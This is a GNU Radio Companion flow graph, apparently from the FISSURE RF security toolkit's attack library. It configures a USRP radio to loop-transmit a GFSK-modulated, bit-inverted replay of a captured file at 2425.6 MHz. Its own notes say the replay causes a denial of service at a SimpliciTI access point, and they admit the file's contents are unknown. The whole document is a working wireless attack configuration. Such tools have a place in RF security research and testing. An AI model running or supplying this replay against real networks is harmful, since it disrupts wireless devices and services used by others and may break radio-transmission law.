options:
  parameters:
    category: Custom
    generate_options: no_gui
    id: SimpliciTI_MSK_USRPX310_Access_Point_DoS
    output_language: python
  states: {}

blocks:
- name: filepath
  id: variable
  parameters:
    value: '"/home/user/FISSURE/Flow Graph Library/Single-Stage Flow Graphs/Attack Files/SimpliciTI_AP_DoS.bin"'
  states: {}
- name: ip_address
  id: variable
  parameters:
    value: '"192.168.40.2"'
  states: {}
- name: notes
  id: variable
  parameters:
    value: '"Replays data that will create a denial of service at the access point. Not sure what is in the file."'
  states: {}
- name: sample_rate
  id: variable
  parameters:
    value: 8e6
  states: {}
- name: tx_frequency
  id: variable
  parameters:
    value: 2425.6e6
  states: {}
- name: tx_frequency
  id: variable
  parameters:
    value: 2477.80e6
  states: {state: disabled}
- name: tx_usrp_antenna
  id: variable
  parameters:
    value: '"TX/RX"'
  states: {}
- name: tx_usrp_channel
  id: variable
  parameters:
    value: '"A:0"'
  states: {}
- name: tx_usrp_gain
  id: variable
  parameters:
    value: '30'
  states: {}
- name: blocks_char_to_float_0
  id: blocks_char_to_float
  parameters:
    scale: '1'
  states: {}
- name: blocks_file_source_0
  id: blocks_file_source
  parameters:
    file: filepath
    repeat: 'True'
    type: byte
  states: {}
- name: blocks_float_to_char_0
  id: blocks_float_to_char
  parameters:
    scale: '1'
  states: {}
- name: blocks_multiply_const_vxx_0
  id: blocks_multiply_const_vxx
  parameters:
    const: '-1'
    type: float
  states: {}
- name: blocks_multiply_const_vxx_1
  id: blocks_multiply_const_vxx
  parameters:
    const: '0.1'
    type: complex
  states: {}
- name: blocks_not_xx_0_0
  id: blocks_not_xx
  parameters:
    type: byte
  states: {}
- name: blocks_unpack_k_bits_bb_0
  id: blocks_unpack_k_bits_bb
  parameters:
    k: '8'
  states: {}
- name: digital_gfsk_mod_0
  id: digital_gfsk_mod
  parameters:
    bt: '0.5'
    samples_per_symbol: '4'
    sensitivity: '0.2'
  states: {}
- name: uhd_usrp_sink_0
  id: uhd_usrp_sink
  parameters:
    ant0: tx_usrp_antenna
    center_freq0: tx_frequency
    clock_rate: '0.0'
    dev_args: '"addr=" + ip_address'
    gain0: tx_usrp_gain
    len_tag_name: ''
    samp_rate: sample_rate
    sd_spec0: tx_usrp_channel
    sync: sync
    type: fc32
  states: {}

connections:
- [blocks_char_to_float_0, '0', blocks_multiply_const_vxx_0, '0']
- [blocks_file_source_0, '0', blocks_unpack_k_bits_bb_0, '0']
- [blocks_float_to_char_0, '0', blocks_not_xx_0_0, '0']
- [blocks_multiply_const_vxx_0, '0', blocks_float_to_char_0, '0']
- [blocks_multiply_const_vxx_1, '0', uhd_usrp_sink_0, '0']
- [blocks_not_xx_0_0, '0', digital_gfsk_mod_0, '0']
- [blocks_unpack_k_bits_bb_0, '0', blocks_char_to_float_0, '0']
- [digital_gfsk_mod_0, '0', blocks_multiply_const_vxx_1, '0']

metadata:
  file_format: 1
  grc_version: v3.11.0.0git-207-gcaa7e7f1
